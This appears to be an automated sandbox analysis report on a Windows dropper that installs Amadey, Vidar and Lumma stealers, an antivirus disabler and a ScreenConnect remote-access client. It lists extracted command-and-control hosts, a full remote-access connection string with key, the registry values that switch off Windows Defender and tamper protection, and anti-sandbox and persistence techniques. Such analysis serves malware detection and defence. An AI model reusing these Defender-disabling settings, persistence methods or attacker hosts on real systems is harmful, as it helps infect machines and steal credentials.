Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
26/02/2025, 17:45
Static task
static1
Behavioral task
behavioral1
Sample
09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe
Resource
win10v2004-20250217-en
General
-
Target
09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe
-
Size
1.9MB
-
MD5
4b32390bd07d754d4655d1f2bc7389d6
-
SHA1
93003ef7c9e84d9209879bad45942cf9d83c8572
-
SHA256
09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c
-
SHA512
d8e4b2beff9cac877f119e5e33539948e7f6c75162d83492f4ccc468ecacfb0d3f812af9863b8f91385efd61bc91d6f292c148f0c400d49e25a27096bd0b3d8e
-
SSDEEP
49152:IR2a3vYxy2H00o0o/LtwsiBmJY0TAAeMD/+iCPMrbQpmQ:M28QitwIV3eMDGDPqbQp
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
lumma
https://collapimga.fun/api
https://strawpeasaen.fun/api
https://paleboreei.biz/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 13 IoCs
resource yara_rule behavioral1/memory/3348-4015-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4016-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4018-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4032-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4033-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4038-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4045-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4051-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4058-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4059-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4060-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4064-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3348-4065-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/5732-846-0x0000000000E90000-0x00000000012EE000-memory.dmp healer behavioral1/memory/5732-847-0x0000000000E90000-0x00000000012EE000-memory.dmp healer behavioral1/memory/5732-1368-0x0000000000E90000-0x00000000012EE000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 865402586c.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 865402586c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 865402586c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 865402586c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 865402586c.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 865402586c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 865402586c.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 865402586c.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 865402586c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 865402586c.exe -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2b11d98461.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 865402586c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d6bdc78f1f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7834599193.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5da4d270e0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2C8851.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3bc90bf583.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 33 6052 rapes.exe 33 6052 rapes.exe 33 6052 rapes.exe 33 6052 rapes.exe 33 6052 rapes.exe 33 6052 rapes.exe 33 6052 rapes.exe 33 6052 rapes.exe 33 6052 rapes.exe 257 2356 BitLockerToGo.exe 261 3732 BitLockerToGo.exe 336 6052 rapes.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=c7953919-4da6-4d54-a2b3-ac11fb7a18a8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAXEXOaPLDqU%2boQ05wXep0vAAAAAACAAAAAAAQZgAAAAEAACAAAADvm6bcPinNMIRpc65lEJ%2b8ElBp9JVbgWHh2STu%2fHrTmAAAAAAOgAAAAAIAACAAAACjHo3fMO%2bGwm5SLZQ586fYpm%2b9HcHNImMxjAs5MhlpXaAEAABEdrPEp1kgJOw5c4o0SKMp%2bbzf4iE4L3v8%2bXNEASuKfEk1IGFRYzU3KDcC%2badmZMda0qB7df82aEKWA7lkpmlY52t6OFVplQgMmrLGIfNolfWAZZIUmiX%2fP0JFeqjTdTl6wD%2f74gWCtC737%2buAyp35BPTkF1tYZFf0ztVbWBD3bmnf27HCdDqo1W3O%2brw8o6xL7yI7XXef4NeRedB49jE8LvYbSsV0eeanNnbe1fowo1CzCpIUR0k8N4gDDveAq0ZuOOgatA4TrimL9Qi98hm%2f1luP39lBSY5KLmwF0vvDZp4XvetXeEF5KcN8sRoW6B1qy0TPlorq%2fhTFod2s3o2ZKKM4TmIeDDhUenFqnyh%2fhYx2y1gFD%2fnQDTvCaH0pdetpbhjWjfXyI33DB%2bU8duWSbFNO3hnB8afii3bPJcuqJx6uLsQ8kZ5B%2fbyV0%2b7YCtSWh6aOsJ9kD8SVF3VUGXVda7%2fNRgCyiNVLAo2lhVPN2czT4LfxUbnmBbk%2bTrjVf9bSYk3txrOlJExtOcfent1zbsRmoSlxJaJnoLzN65ODDqbugWw%2fW0%2bQaNZ14n4LzLwtUl7HQ1MS%2bbYrz7Mx6M2xvsKHAahtCl4ctrjxsOR3XLCid0vCnleAs9%2fkrU5yAeOOfV35VEMAdo15aNx3CdcyhgdO3qPRk5czw%2fWb624MI83685NjNp4iiJehcI6JdhzEoi%2fiFWnwbZ608uZLSIXYTE83d2qww8g7BthSfR7OsSREJ9b84AYgfUcVKzpG%2failsEjrPGHr9n545W1742qqu7u6U6oRB%2fkJ7gA4XWNqZoKx%2fKeini9rsFCdTMYSnWEU7bXxTtvc1cXlMrPKJrKMvKsnuYLuOTAIxaPEV0HanaA6SSPoBJECj7v6P%2bOH7oVdE0ZIncSk58ksE8RFywK%2fHpUxJ8Bh1X63vts6KzZBh73dxG0mfRAQSudiYTIReC%2biuFzxBN3sZEraAvnvVft7ApKTMS0qQe8LsKdHV4%2br%2fDPbtr%2frglwVqPmgiMUzPNp49tNDT5zwVD153O61wo1dKHtlWsUtTpNOKEOFmZafW1y48mvBsg%2fQ%2bHOFz38FkJXlPf8zHkiquOZrQ7E%2b2Wh9K10d%2bSeQ%2b5kuyUN1U3YxcFMPQENoLC9Sx2ZW%2bIB08BOMZeRCnkzBpWf06WkcoaC1IV%2fj%2bydKMqw7UzZNsUD6kQlaHAZc%2bB%2b0cWgz6JAc%2bWDMnQNSf9%2bJUnpJjDG7LtuWGcicWuYIryoJcQxsYSjrG1Qvtn3cDbikG%2fneEcyrQ%2bolTllZ%2fS4rh2lIaJm5uJhs8EJAa1T73H2ZZibUY8qy4RXEMu4WWso2BmvKcZR%2bJXHIBykJc4tCBUfHUQlltMnFmii5KQw8%2fS0KgvBO83prC0ehsoGIbmwmjv9TKHo61V9BKePDnvOyUT34J5eOiiKJYXmedgXwfOx2JimrQu%2bsaX8iTeJo3c3W0hjvFPqw3pbtEOAetyLGWOWbS%2f339IlbN8EEolsM4bJqfeQgF60xGh7KoUitq%2f%2fByZDOI1%2fcyo%2fJOrY01zc%2fVUOO8EHS1bxRkW%2bOKWVeliP1FZZYRXs7REAAAACPcOTwtnkNgF%2bN2DGZCWpXtLqXwViXN5krE43F%2fH8SkOR1QssJ5akASHa%2bkjsi%2f7pDaeau%2fl4M2Lbg%2bAzEsurk&c=test&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3548 chrome.exe 5640 chrome.exe 3336 chrome.exe 3176 chrome.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7834599193.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7834599193.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5da4d270e0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5da4d270e0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2C8851.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2C8851.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3bc90bf583.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3bc90bf583.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b11d98461.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 865402586c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 865402586c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d6bdc78f1f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b11d98461.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d6bdc78f1f.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation 1H13T0.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation 67e0HNq.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 20 IoCs
pid Process 2060 1H13T0.exe 6052 rapes.exe 5816 2C8851.exe 3404 3bc90bf583.exe 3040 rapes.exe 5980 2b11d98461.exe 4900 c401331e54.exe 5732 865402586c.exe 3548 rapes.exe 5060 d6bdc78f1f.exe 4172 7834599193.exe 7132 5da4d270e0.exe 1396 67e0HNq.exe 1220 ScreenConnect.ClientService.exe 1672 ScreenConnect.WindowsClient.exe 3312 ScreenConnect.WindowsClient.exe 836 VBUN8fn.exe 828 rapes.exe 4404 q3na5Mc.exe 3348 q3na5Mc.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 2C8851.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 3bc90bf583.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 2b11d98461.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 865402586c.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine d6bdc78f1f.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 7834599193.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 5da4d270e0.exe -
Loads dropped DLL 22 IoCs
pid Process 2292 MsiExec.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 7100 MsiExec.exe 3216 MsiExec.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 865402586c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 865402586c.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c401331e54.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10033690101\\c401331e54.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\865402586c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10033700101\\865402586c.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2b11d98461.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10033680101\\2b11d98461.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023d5b-65.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\sz15rtv2.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\sz15rtv2.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 5816 2C8851.exe 3404 3bc90bf583.exe 5980 2b11d98461.exe 5732 865402586c.exe 5060 d6bdc78f1f.exe 4172 7834599193.exe 7132 5da4d270e0.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5060 set thread context of 2356 5060 d6bdc78f1f.exe 129 PID 7132 set thread context of 3732 7132 5da4d270e0.exe 133 PID 4404 set thread context of 3348 4404 q3na5Mc.exe 162 -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources msiexec.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\e598d52.msi msiexec.exe File created C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A} msiexec.exe File created C:\Windows\Installer\e598d54.msi msiexec.exe File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon msiexec.exe File created C:\Windows\Installer\e598d52.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\rapes.job 1H13T0.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8E1D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E4D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F09.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5016 4404 WerFault.exe 161 -
System Location Discovery: System Language Discovery 1 TTPs 30 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VBUN8fn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2C8851.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c401331e54.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language q3na5Mc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language q3na5Mc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7834599193.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 67e0HNq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language c401331e54.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5da4d270e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 865402586c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1H13T0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3bc90bf583.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b11d98461.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage c401331e54.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d6bdc78f1f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000090f11e24ea83ce490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000090f11e240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090090f11e24000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d90f11e24000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000